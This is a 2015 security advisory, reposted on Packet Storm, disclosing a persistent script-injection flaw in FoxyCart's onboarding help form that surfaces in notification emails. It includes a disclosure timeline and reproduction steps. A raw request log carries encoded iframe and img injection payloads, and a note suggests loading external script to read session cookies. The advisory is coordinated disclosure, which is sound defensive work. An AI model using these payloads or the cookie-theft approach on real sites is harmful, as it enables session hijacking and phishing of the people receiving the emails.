FoxyCart Filter Bypass

2015-07-17T00:00:00
ID PACKETSTORM:132732
Type packetstorm
Reporter Benjamin Kunz Mejri
Modified 2015-07-17T00:00:00

Description

                                        
                                            `Document Title:  
===============  
FoxyCart Bug Bounty #1 - Filter Bypass & Persistent Vulnerability  
  
  
References (Source):  
====================  
http://www.vulnerability-lab.com/get_content.php?id=1451  
  
098bdc9b309783df65044c5abb690dafdd4bcd436c380ae68c924fe37e14b4e0  
  
  
Release Date:  
=============  
2015-07-15  
  
  
Vulnerability Laboratory ID (VL-ID):  
====================================  
1451  
  
  
Common Vulnerability Scoring System:  
====================================  
3.4  
  
  
Product & Service Introduction:  
===============================  
Helping developers _add_ custom ecommerce without reinventing the wheel.  
  
(Copy of the Homepage: https://github.com/FoxyCart )  
  
  
Abstract Advisory Information:  
==============================  
The Vulnerability Laboratory Core Research Team discovered a filter bypass issue and an application-side input validation vulnerability in the official FoxyCart web-application.  
  
  
Vulnerability Disclosure Timeline:  
==================================  
2015-03-05: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)  
2015-04-01: Vendor Notification (FoxyCart - Security Research Team)  
2015-04-09: Vendor Response/Feedback (FoxyCart - Security Research Team)  
2015-06-30: Vendor Fix/Patch ( (FoxyCart - Developer Team)  
2015-07-15: Public Disclosure (Vulnerability Laboratory)  
  
  
Discovery Status:  
=================  
Published  
  
  
Affected Product(s):  
====================  
FoxyCart LLC  
Product: FoxyCart - Web Application 2015 Q2  
  
  
Exploitation Technique:  
=======================  
Remote  
  
  
Severity Level:  
===============  
Medium  
  
  
Technical Details & Description:  
================================  
A persistent input validation mail encoding vulnerability has been discovered in the official FoxyCart company web-application.  
The issue allows remote attackers to inject own malicious web context to the application-side of a vulnerable module or function.  
  
The security vulnerability is located in the `comments` input field value of the `landing/white-glove-onboarding > Help Form` module.   
Remote attackers can exploit the issue to execute persistent malicious context in foxycart service mails.  
  
The injection takes place in the help contact form POST method request with the vulnerable comments input value. The execution of the   
script code occurs on the application-side in the email body context. Attackers are able to inject iframes, img sources with onload alert   
or other script code tags. The service does not encode the input and has also no input restriction.   
  
After the code has been saved during the registration the internal service takes the wrong encoded dbms entries and stream them back in a   
notification mail to the registered users inbox. The attacker is also able to include random email adresses to stream mails with malicious   
persistent context to random targets for phishing, spam and co. The code does not execute in the profile values that introduces to the   
manufacturer itself but in the attached comments value that becomes visible in the copy mail.  
  
The security risk of the persistent input validation web vulnerability in the mail encoding of the web-server is estimated as medium with a cvss   
(common vulnerability scoring system) count of 3.4. If the issue is existing in the main service values the other services can be affected by the   
issue too. Exploitation of the mail encoding and web-server validation vulnerability requires low or medium user interaction and no privileged   
customer application user account. Successful exploitation of the persistent mail encoding web vulnerability results in session hijacking, persistent   
phishing attacks, persistent redirects to external malicious source and persistent manipulation of affected or connected module context.  
  
Request Method(s):  
[+] POST  
  
Vulnerable Module(s):  
[+] landing/white-glove-onboarding > Help Form  
  
Vulnerable Parameter(s):  
[+] comments  
  
Affected Module(s):  
[+] We`ve received your email  
  
  
Proof of Concept (PoC):  
=======================  
The persistent input validation web vulnerability can be exploited by remote attackers without privileged application user account and with low or medium user interaction.  
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.  
  
Manual steps to reproduce ...  
1. Open the foxcart service  
2. Surf to the vulnerable conatct form url  
3. Inject random value to the inputs and inject to the comments your script code payload  
4. Save the entry  
5. Redirect via Refresh Referer to confirm the contact request  
6. Check inbox of the contact mail input  
7. The code executes in the comments body section  
8. Successful reproduce of the vulnerability!   
  
  
  
--- PoC Session Logs [POST] (Inject) ---  
13:33:03.031[1210ms][total 1210ms] Status: 302[Found]  
POST http://www.foxycart.com/landing/white-glove-onboarding Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[text/html]  
Request Header:  
Host[www.foxycart.com]  
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]  
Accept-Language[de,en-US;q=0.7,en;q=0.3]  
Accept-Encoding[gzip, deflate]  
Referer[http://www.foxycart.com/landing/white-glove-onboarding]  
Cookie[optimizelySegments=%7B%22234696064%22%3A%22ff%22%2C%22234587425%22%3A%22false%22%2C%22234346863%22%3A%22referral%22%7D; optimizelyEndUserId=oeu1425557285423r0.7588310203460514; optimizelyBuckets=%7B%22630610022%22%3A%22637250003%22%7D; __utma=91412365.670830544.1425557288.1425557288.1425557288.1; __utmb=91412365.49.9.1425557973207; __utmc=91412365; __utmz=91412365.1425557288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wcsid=bVqtl3HXcMvZjcCk575fV3P3JO6NjyT2; hblid=cXd4qSmViFwp1L9N575fV3P3JONRArB8; _oklv=1425558756967%2CbVqtl3HXcMvZjcCk575fV3P3JO6NjyT2; ajs_user_id=%22bkm%40evolution-sec.com%22; ajs_group_id=null; ajs_anonymous_id=%22f9f4d6e9-ba8f-4231-b4e5-fb1e4dd21d01%22; __ar_v4=M2MP7NP4NRDZJKE5JJ255A%3A20150304%3A14%7CMZASOLFIIFHM7D4UXSZSHG%3A20150304%3A14%7CZ5SPRZQMMBAYPLL3Z7BEBR%3A20150304%3A14; kvcd=1425558696901; km_ai=bkm%40evolution-sec.com; km_uq=; km_vs=1; km_lv=1425558697; olfsk=olfsk9501150073115311; _okbk=cd4%3Dtrue%2Cvi5%3D0%2Cvi4%3D1425557290132%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8%3Dchat%2Ccd6%3D0%2Ccd5%3Daway%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=2799-934-10-5695; __utmv=91412365.|1=user_type=programmer%20developer%20merchant=1^2=trial=0.1=1; km_ni=bkm%40evolution-sec.com; optimizelyPendingLogEvents=%5B%5D]  
Connection[keep-alive]  
POST-Daten:  
firstName[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]  
lastName[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]  
email[bkm%40evolution-sec.com]  
phone[235235235]  
field-0[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]  
field-3[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]  
field-4[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]  
id[840b20b9386a4e669f20873f092ae257]  
Response Header:  
Content-Type[text/html]  
Expires[Thu, 05 Mar 15 04:34:12 -0800]  
Cache-Control[max-age=60]  
Vary[Accept-Encoding]  
Location[http://www.foxycart.com/landing/white-glove-onboarding?contact=submitted]  
Content-Length[0]  
Accept-Ranges[bytes]  
Date[Thu, 05 Mar 2015 12:33:13 GMT]  
Connection[keep-alive]  
X-Frame-Options[SAMEORIGIN]  
  
  
-  
-  
13:33:04.242[1255ms][total 1728ms] Status: 200[OK]  
GET http://www.foxycart.com/landing/white-glove-onboarding?contact=submitted Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[7726] Mime Type[text/html]  
Request Header:  
Host[www.foxycart.com]  
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]  
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]  
Accept-Language[de,en-US;q=0.7,en;q=0.3]  
Accept-Encoding[gzip, deflate]  
Referer[http://www.foxycart.com/landing/white-glove-onboarding]  
Cookie[optimizelySegments=%7B%22234696064%22%3A%22ff%22%2C%22234587425%22%3A%22false%22%2C%22234346863%22%3A%22referral%22%7D; optimizelyEndUserId=oeu1425557285423r0.7588310203460514; optimizelyBuckets=%7B%22630610022%22%3A%22637250003%22%7D; __utma=91412365.670830544.1425557288.1425557288.1425557288.1; __utmb=91412365.49.9.1425557973207; __utmc=91412365; __utmz=91412365.1425557288.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wcsid=bVqtl3HXcMvZjcCk575fV3P3JO6NjyT2; hblid=cXd4qSmViFwp1L9N575fV3P3JONRArB8; _oklv=1425558756967%2CbVqtl3HXcMvZjcCk575fV3P3JO6NjyT2; ajs_user_id=%22bkm%40evolution-sec.com%22; ajs_group_id=null; ajs_anonymous_id=%22f9f4d6e9-ba8f-4231-b4e5-fb1e4dd21d01%22; __ar_v4=M2MP7NP4NRDZJKE5JJ255A%3A20150304%3A14%7CMZASOLFIIFHM7D4UXSZSHG%3A20150304%3A14%7CZ5SPRZQMMBAYPLL3Z7BEBR%3A20150304%3A14; kvcd=1425558696901; km_ai=bkm%40evolution-sec.com; km_uq=; km_vs=1; km_lv=1425558697; olfsk=olfsk9501150073115311; _okbk=cd4%3Dtrue%2Cvi5%3D0%2Cvi4%3D1425557290132%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8%3Dchat%2Ccd6%3D0%2Ccd5%3Daway%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=2799-934-10-5695; __utmv=91412365.|1=user_type=programmer%20developer%20merchant=1^2=trial=0.1=1; km_ni=bkm%40evolution-sec.com; optimizelyPendingLogEvents=%5B%5D]  
Connection[keep-alive]  
Response Header:  
Content-Type[text/html]  
Expires[Thu, 05 Mar 15 04:34:13 -0800]  
Cache-Control[max-age=60]  
Vary[Accept-Encoding]  
Content-Encoding[gzip]  
Content-Length[7726]  
Accept-Ranges[bytes]  
Date[Thu, 05 Mar 2015 12:33:14 GMT]  
Connection[keep-alive]  
X-Frame-Options[SAMEORIGIN]  
  
  
  
Note: Inject an img or iframe with an external js source that requests session data by usage of document.cookie to exploit  
  
Reference(s):  
http://www.foxycart.com/landing/white-glove-onboarding  
http://www.foxycart.com/landing/white-glove-onboarding?contact=submitted  
  
  
Solution - Fix & Patch:  
=======================  
The vulnerability can be patched by a secure filter mechanism next to the help comment support form.  
Restrict the input and encode the output message with the delivered copy.  
  
  
Security Risk:  
==============  
The security risk of the filter issue and application-side input validation vulnerability is estimated as medium. (CVSS 3.4)  
  
  
Credits & Authors:  
==================  
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]  
  
  
Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed   
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable   
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab   
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for   
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,   
policies, deface websites, hack into databases or trade with fraud/stolen material.  
  
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com  
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com  
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact  
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab  
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php  
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/  
  
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to   
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by   
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website   
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact   
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.  
  
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™  
  
--   
VULNERABILITY LABORATORY - RESEARCH TEAM  
SERVICE: www.vulnerability-lab.com  
CONTACT: research@vulnerability-lab.com  
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt  
  
  
`